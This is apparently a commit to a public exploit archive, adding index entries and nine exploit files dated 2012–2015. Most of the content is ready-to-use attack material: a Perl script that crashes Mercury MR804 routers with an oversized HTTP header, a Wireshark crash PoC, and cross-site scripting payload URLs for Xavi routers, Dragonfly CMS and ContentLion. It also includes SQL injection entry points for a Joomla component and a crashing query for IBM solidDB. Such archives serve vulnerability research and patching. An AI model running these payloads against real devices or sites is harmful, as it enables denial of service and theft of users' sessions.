DB: 2015-05-01

9 new exploits
2015-05-01 05:02:12 +00:00 · 2015-05-01 05:02:12 +00:00 · 3e2b440887
commit 3e2b440887
parent 891000cdf7
10 changed files with 138 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -33243,6 +33243,7 @@ id,file,description,date,author,platform,type,port
 36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution PoC",2015-04-27,"Jay Turla",multiple,remote,0
 36844,platforms/php/webapps/36844.txt,"WordPress <= 4.2 - Stored XSS",2015-04-27,klikki,php,webapps,0
 36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
+36840,platforms/multiple/local/36840.py,"Wireshark <=1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,local,0
 36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
 36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0
@ -33256,3 +33257,11 @@ id,file,description,date,author,platform,type,port
 36860,platforms/php/webapps/36860.txt,"WordPress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80
 36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,"John Page",windows,webapps,5466
 36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
+36863,platforms/php/webapps/36863.txt,"Joomla Machine Component Multiple SQL Injection Vulnerabilities",2012-02-20,the_cyber_nuxbie,php,webapps,0
+36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router Multiple Function CSRF",2012-02-21,Busindre,hardware,remote,0
+36865,platforms/hardware/remote/36865.txt,"Xavi 7968 ADSL Router webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter XSS",2012-02-21,Busindre,hardware,remote,0
+36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router webconfig/wan/confirm.html/confirm pvcName Parameter XSS",2012-02-21,Busindre,hardware,remote,0
+36867,platforms/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 Multiple Multiple Cross Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,php,webapps,0
+36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router Multiple HTTP Header Fields Denial Of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0
+36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 'SELECT' Statement 'WHERE' Condition Denial of Service Vulnerability",2012-02-09,IBM,multiple,dos,0
+36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 'login.php' Cross Site Scripting Vulnerability",2012-02-22,"Stefan Schurtz",php,webapps,0
--- a/platforms/hardware/dos/36868.pl
+++ b/platforms/hardware/dos/36868.pl
@ -0,0 +1,43 @@
+source: http://www.securityfocus.com/bid/52106/info
+
+Mercury MR804 router is prone to multiple denial-of-service vulnerabilities.
+
+Remote attackers can exploit these issues to cause the device to crash, denying service to legitimate users.
+
+Mercury MR804 running version 3.8.1 Build 101220 is vulnerable. 
+
+#-------------------------------------------------------------
+#!/usr/bin/perl -w
+use Socket;
+$|=1;
+print '*********************************'."\n";
+print '* mercurycom MR804 v8.0 DoS PoC *'."\n";
+print '*  writed by demonalex@163.com  *'."\n";
+print '*********************************'."\n";
+$evil='A'x4097;
+$test_ip=shift;                           #target ip
+$test_port=shift;                         #target port
+if(!defined($test_ip) || !defined($test_port)){
+    die "usage : $0 target_ip target_port\n";
+}
+$test_payload=
+"GET / HTTP/1.0\r\n".
+"Accept: */*\r\n".
+"Accept-Language: zh-cn\r\n".
+"UA-CPU: x86\r\n".
+"If-Unmodified-Since: ".$evil."\r\n".
+"Accept-Encoding: gzip, deflate\r\n".
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
+" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
+"Host: ".$test_ip."\r\n".
+"Connection: Keep-Alive"."\r\n\r\n";
+$test_target=inet_aton($test_ip);
+$test_target=sockaddr_in($test_port, $test_target);
+socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n";
+connect(SOCK, $test_target) || die "cannot connect the target!\n";
+send(SOCK, $test_payload, 0) || die "cannot send the payload!\n";
+#recv(SOCK, $test_payload, 100, 0);
+close(SOCK);
+print "done!\n";
+exit(1);
+#------------------------------------------------------------- 
--- a/platforms/hardware/remote/36864.txt
+++ b/platforms/hardware/remote/36864.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52098/info
+
+Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities.
+
+The attacker can exploit the issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, or perform certain administrative functions on victim's behalf. Other attacks are also possible. 
+
+http://www.example.com/webconfig/wan/confirm.html/confirm?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e%26vpi%3D0%26vci%3D38%26scat%3DUBR%26accessmode%3Dpppoe%26encap%3Dvcmux%26encapmode%3Dbridged%26iptype%3Ddhcp%26nat_enable%3Dfalse%26def_route_enable%3Dfalse%26qos_enable%3Dfalse%26chkPPPOEAC%3Dfalse%26tBoxPPPOEAC%3DNot%2520Configured%26sessiontype%3Dalways_on%26username%3Da%26password%3Dss&confirm=+Apply+
--- a/platforms/hardware/remote/36865.txt
+++ b/platforms/hardware/remote/36865.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52098/info
+ 
+Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities.
+ 
+The attacker can exploit the issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, or perform certain administrative functions on victim's behalf. Other attacks are also possible.
+ 
+http://www.example.com/webconfig/lan/lan_config.html/local_lan_config?ip_add_txtbox=www.example2.com&sub_mask_txtbox=255.255.255.0&host_name_txtbox=Hack<SCRIPT>alert(document.cookie)</script>&domain_name_txtbox=local.lan&mtu_txtbox=1500&next=Apply
--- a/platforms/hardware/remote/36866.txt
+++ b/platforms/hardware/remote/36866.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52098/info
+  
+Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities.
+  
+The attacker can exploit the issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, or perform certain administrative functions on victim's behalf. Other attacks are also possible.
+
+http://www.example.com/webconfig/wan/confirm.html/confirm?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e%26vpi%3D0%26vci%3D38%26scat%3DUBR%26accessmode%3Dpppoe%26encap%3Dvcmux%26encapmode%3Dbridged%26iptype%3Ddhcp%26nat_enable%3Dfalse%26def_route_enable%3Dfalse%26qos_enable%3Dfalse%26chkPPPOEAC%3Dfalse%26tBoxPPPOEAC%3DNot%2520Configured%26sessiontype%3Dalways_on%26username%3Da%26password%3Dss&confirm=+Apply+
--- a/platforms/multiple/dos/36869.txt
+++ b/platforms/multiple/dos/36869.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52111/info
+
+IBM solidDB is prone to a denial-of-service vulnerability.
+
+Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
+
+IBM solidDB versions prior to 6.5.0.8 Interim Fix 6 are vulnerable. 
+
+SELECT * FROM a WHERE (b >0) AND (b IN (1,2)) 
--- a/platforms/multiple/local/36840.py
+++ b/platforms/multiple/local/36840.py
@ -0,0 +1,30 @@
+#!/usr/bin/python
+# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
+# AUTHOR: Avinash Kumar Thapa "-Acid"
+# Date of Testing: 26th April'2015
+# Vendor Homepage: http://www.wireshark.org
+# Tested On : Windows 8.1 Pro
+# Steps to Reproduce the Crash
+# Step 1: Create a File Using PoC
+# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
+# Step 3: Click "Apply"
+# Some other places for the Crash are:
+# Statistics > IP Statistics then any of the field you can use.
+# Statistics > Packet Length > Paste the buffer in the field
+# Statistics > ANCP
+# Statistics > Collectd
+# Statistics > Compared
+# Statistis  > 
+
+
+buffer = "A"*80000
+
+file = open("wireshark.txt","w")
+file.write(buffer)
+file.close()
+
+print "POC Created by -Acid"
+print " Email: acid.exploit@gmail.com"
+
+
+
--- a/platforms/php/webapps/36863.txt
+++ b/platforms/php/webapps/36863.txt
@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/52095/info
+
+The Machine component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_machine&view=machine&Itemid=[SQL Injection]
+http://www.example.com/index.php?option=com_machine&view=machine&Itemid=xxx&idMacchina=[SQL Injection] 
--- a/platforms/php/webapps/36867.txt
+++ b/platforms/php/webapps/36867.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52100/info
+
+Dragonfly CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Dragonfly 9.3.3.0 is vulnerable; other versions may be affected. 
+
+http://www.example.com/index.php?name=coppermine&file=thumbnails&meta=lastup%22%3E%3CsCrIpT%3Ealert%2852128%29%3C%2fsCrIpT%3E&cat=0 
--- a/platforms/php/webapps/36870.txt
+++ b/platforms/php/webapps/36870.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52112/info
+
+ContentLion Alpha is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+ContentLion Alpha 1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/contentlion-alpha-1-3/login.html?'"</script><script>alert('JaVaScr1pT')</script>